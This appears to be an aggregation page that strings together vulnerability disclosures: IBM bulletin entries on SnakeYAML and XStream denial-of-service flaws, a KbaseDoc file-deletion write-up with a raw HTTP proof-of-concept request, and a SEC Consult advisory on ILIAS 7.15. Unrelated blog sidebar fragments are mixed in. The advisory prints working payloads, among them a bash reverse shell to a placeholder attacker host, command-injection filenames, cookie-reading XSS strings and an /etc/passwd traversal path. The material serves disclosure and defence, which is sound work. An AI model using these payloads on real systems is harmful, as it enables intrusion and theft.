CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235313 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-38750  
**DESCRIPTION:**   SnakeYAML is vulnerable to a denial of service, caused by a stack-overflow in parsing YAML files. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 3.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235312 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-38752  
**DESCRIPTION:**   SnakeYAML is vulnerable to a denial of service, caused by a stack-overflow in parsing YAML files. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235310 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-40152  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236355 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40153  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236356 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40156  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236359 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40154  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236357 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40155  
**DESCRIPTION:**   XStream is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236358 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Cloud Transformation Advisor

2.0.1 - 3.3.1

  

**Remediation/Fixes**

**Product(s)**

**Version(s)**

**Remediation/Fix/Instructions**

IBM Cloud Transformation Advisor

2.0.1 - 3.3.1

Install v3.4.0 from OperatorHub page in Red Hat OpenShift Container Platform or locally following this link.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

01 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS5Q6W","label":"IBM Cloud Transformation Advisor"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"3.4","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-41299: Security Bulletin: IBM Cloud Transformation Advisor is vulnerable to multiple vulnerabilities

Kbase Doc v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /web/IndexController.java.

****KbaseDoc V1.0 has an arbitrary file deletion vulnerability******Description:**

Kbase doc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java

Source code download address: https://github.com/ekoz/kbase-doc

Version: 1.0

**Vulnerability analysis:**

Locate the location where the vulnerability exists: src/main/java/com/eastrobot/doc/web/IndexController.java 

The POST request gets the name parameter,Since there is no filtering,As a result, parameters such as ../ can be spliced,Causes directory traversal,Because deletion is involved,Resulting in arbitrary file deletion vulnerability.

**Recurrence of vulnerability**

**Download the source code and build the local environment**

Create a poc.txt file in the kbase-doc-master\target\classes directory .

Use burpsuite to construct the following request.

\[+\] POC:

    POST /index/delete HTTP/1.1
    Host: test:8081
    Content-Length: 22
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
    Connection: close
    
    name=..%2F..%2Fpoc.txt
    
    

It is found that poc.txt is deleted.

**Proof and Exploit:**

href

CVE-2022-45290: KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability/README.md at main · HH1F/KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability

In BAOTA linux panel there exists a stored xss vulnerability attackers can use to obtain sensitive information via the log analysis feature.

*   热门文章
*   最新评论
*   随机文章

**热门文章**

*   **CTF**
    
    浏览次数: 3058
    
*   **emmc写入pve**
    
    浏览次数: 2163
    
*   **MacBook M1安装Java版本Burp**
    
    浏览次数: 1335
    
*   **英特尔NUC安装UNRAID实现win显卡直通+多系统**
    
    浏览次数: 1136
    
*   **PVE**
    
    浏览次数: 1086
    

**最新评论**

*   xxx
    
    测试
    
*   我爱你
    
    我爱你
    
*   我爱你
    
    我爱你
    
*   我爱你
    
    我爱你
    
*   我爱你
    
    我爱你
    

**随机文章**

*   **emmc写入pve**
    
    浏览次数: 2163
    
*   **英特尔NUC安装UNRAID实现win显卡直通+多系统**
    
    浏览次数: 1136
    
*   **此内容被密码保护**
    
    浏览次数: 515
    
*   **MacBook M1安装Java版本Burp**
    
    浏览次数: 1335
    
*   **BAOTA linux panel storage xss vulnerability**
    
    浏览次数: 268
    

**博客信息**

*   9文章数目
*   38评论数目
*   2年347天运行天数
*   2 天前最后活动

**标签云**

暂无标签

**文章目录**

CVE-2022-4336: BAOTA linux panel storage xss vulnerability

ILIAS eLearning versions 7.15 and below suffer from authenticated command injection, persistent cross site scripting, local file inclusion, and open redirection vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20221206-0 >  
=======================================================================  
               title: Multiple critical vulnerabilities  
             product: ILIAS eLearning platform  
  vulnerable version: <= 7.15  
       fixed version: 7.16  
          CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,  
                      CVE-2022-45918  
              impact: critical  
            homepage: https://www.ilias.de  
               found: 2022-09-30  
                  by: Anna Hartig (Office Bochum)  
                      Constantin Schwarz (Office Bochum)  
                      Niklas Schilling (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Around since 1998, ILIAS is a powerful learning management system that fulfills  
all your requirements. Using its integrated tools, small and large businesses,  
universities, schools and public authorities are able to create tailored,  
individual learning scenarios."

Source: https://www.ilias.de/en/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
ILIAS utilizes several third-party programs to perform tasks like creating PDF  
files or scanning uploaded files for known viruses. These are called using the  
PHP exec() function. In several instances, the arguments passed to the exec()  
function contain user input that is not properly sanitized.  
By performing malicious configuration steps or uploading dangerous files, an  
attacker can execute arbitrary system commands with the rights of the web server  
user (www-data).  
The privilege required for the different instances of command injection range  
from low rights to admin rights.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple stored cross-site scripting vulnerabilities were identified in ILIAS  
course items. These were either achieved by bypassing existing XSS filters or  
simply by exploiting missing input validation altogether. This results in the  
execution of attacker-controlled JavaScript code by the user's browser.  
The attacker requires the right to create course items, e.g., as a tutor of a  
course.

3) Local File Inclusion - CVE-2022-45918  
The included SCORM editor features a debugger that gives authors insights into  
the current SCORM player session, as well as previous sessions. When accessing  
the logs of previous sessions, the debugger fails to validate the requested  
file path, allowing for arbitrary filesystem access.

4) Open Redirect - CVE-2022-45917  
The function shib_logout.php redirects the user to a URL specified in the  
"return" parameter. Since this parameter is not validated, an attacker can use  
it to redirect a victim to an arbitrary website. This is a powerful tool in  
phishing campaigns, as it allows hiding the malicious webpage behind a link that  
looks like it would take you to the real ILIAS webpage.

Proof of concept:  
-----------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
Multiple instances of command injection vulnerabilities were identified:

a) ZIP archive upload  
Normal users with open assessments can submit their solution by uploading a ZIP  
archive. These archives are extracted on the server and scanned for viruses  
recursively. The directory and file names can be used by an attacker to inject  
system commands, e.g., by including a directory with the name  
$(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker  
is able to get a reverse shell on the ILIAS webserver with the rights of the  
web server user (www-data).

b) Media object creation  
ILIAS can be configured so that users can create media objects based on files  
inside an "Upload Directory". Before these objects are created, the files are  
scanned for viruses. The file names can be used by an attacker to inject system  
commands. By placing a file with a name like $(touch /tmp/pwned) inside the  
upload directory and then creating a media object based on it, an attacker is  
able to execute arbitrary system commands with the rights of www-data on the  
server.

c) PDF document creation  
ILIAS provides users the functionality to export content as PDF files. A user  
with admin rights can configure the path to the preferred PDF renderer. An  
attacker can use this parameter to inject system commands. Due to missing  
input validation it is possible to inject multiple commands. The path to  
wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By  
changing the path to:

/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";

an attacker can open a reverse shell with the rights of www-data that connects  
to the attacker's machine on port 13373. The reverse shell is initiated when  
the export function is triggered.  
No PDF renderer has to be installed for this vulnerability to be exploitable.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple instances of stored cross-site scripting were identified:

a) Several Stored XSS Attacks in Tests  
An attacker must be able to create new tests in which the JavaScript code will  
be embedded. If a victim then later accesses one of those tests, the XSS payload will  
be triggered. The "Question" input field of a test has a filter in place, which  
correctly removes HTML tags such as <script> or  
<img src="x" onerror="alert(document.cookie)">. By making use of half open HTML  
tags, this filter can be successfully bypassed. E.g.

<img src="x" onerror="alert(document.cookie)"

This half open HTML tag can also be used in the "Introductory Message" of a test  
to trigger an XSS. It's important to end the JavaScript code with a quotation  
mark or space, to properly separate it from successive HTML tags, after it's  
embedded into a test.

Finally, the "Question" input field of the question type "Long Menu" was  
identified to use no filtering at all, resulting in the unrestricted use of  
arbitrary HTML tags such as <script>.

b) Stored XSS in title of course items  
An attacker with rights to create an arbitrary course item can conduct a stored  
XSS attack by setting the title of the element to:

" onclick="alert(document.cookie)"

When a user clicks on the button to the right of the title, the XSS payload is  
triggered.

c) Stored XSS in HTML sites  
An attacker with rights to edit an HTML Learning Module can conduct a stored  
XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even  
if this behavior is intended, it is insecure and considered bad practice.

3) Local File Inclusion - CVE-2022-45918  
As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS  
platform. An attacker with access to a SCORM player can open the SCORM  
debugger and request the logs of a previous session. By changing the value of  
the "logFile" query parameter of the request, they can read arbitrary  
files of the server's filesystem. For example, to read the passwd file  
on Linux systems, an attacker can change the value of the parameter logfile  
to "../../../../../../../../../etc/passwd".

4) Open Redirect - CVE-2022-45917  
The shib_logout function is vulnerable to an open redirect.  
A URL that successfully uses this vulnerability to redirect to  
"https://www.sec-consult.com" is:

http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com

Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities were identified in ILIAS version 7.14.  
However, a brief analysis of the source code suggests, that several  
vulnerabilities are present in versions dating back to at least 3.8.4.  
Hence it is assumed that most current versions of the product are affected.

The vulnerabilities were partly fixed in version 7.15, a complete patch is  
available with version 7.16.

Vendor contact timeline:  
------------------------  
2022-10-07: Contacting vendor through security@lists.ilias.de  
2022-10-19: Sending initial email again, as the vendor did not yet respond  
2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and  
             identified personal email addresses from the vendor's website.  
2022-10-25: Sending the advisory to the provided contact  
2022-10-31: Vendor requests more information  
2022-10-31: Sending detailed PoC  
2022-11-10: Asking for current status  
2022-11-22: Vendor confirms that patches will be available by 2022-11-26  
2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs  
2022-11-23: Vendor provides information about patched versions; CVE IDs will be  
             requested by SEC Consult  
2022-11-24: Vendor releases patched version 7.16  
2022-12-06: Public release of security advisory

Solution:  
---------  
Update ILIAS to version 7.16 or newer from the vendor's website:  
https://docu.ilias.de/goto.php?target=st_229

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF  A. Hartig, C. Schwarz, N. Schilling / @2022

ILIAS eLearning 7.15 Command Injection / XSS / LFI / Open Redirect

Planet eStream versions prior to 6.72.10.07 suffer from shell upload, account takeover, broken access control, SQL injection, both persistent and reflective cross site scripting, path traversal, and information disclosure vulnerabilities.

Tag

#java